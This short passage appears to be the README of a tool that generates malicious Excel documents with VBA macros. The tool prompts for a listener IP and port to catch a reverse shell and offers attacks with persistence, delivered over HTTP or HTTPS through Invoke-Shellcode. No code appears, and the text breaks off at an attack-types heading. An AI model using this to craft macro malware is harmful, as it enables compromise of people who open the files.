DESCRIPTION

10 | This script will generate malicious Microsoft Excel Documents that contain VBA macros. 11 | This script will prompt you for an IP address and port (you will receive your shell at this address and port) and the name of the malicious document. From there, the script will then prompt you to choose from a menu of different attacks, all with different persistence methods. Once an attack is chosen, it will then prompt you for your payload type. Currently, only HTTP and HTTPS are supported. 12 | 13 | When naming the document, do not include a file extension. 14 | 15 | These attacks use Invoke-Shellcode, which was created by Matt Graeber. Follow him on Twitter --> @mattifestation 16 | 17 |

ATTACK TYPES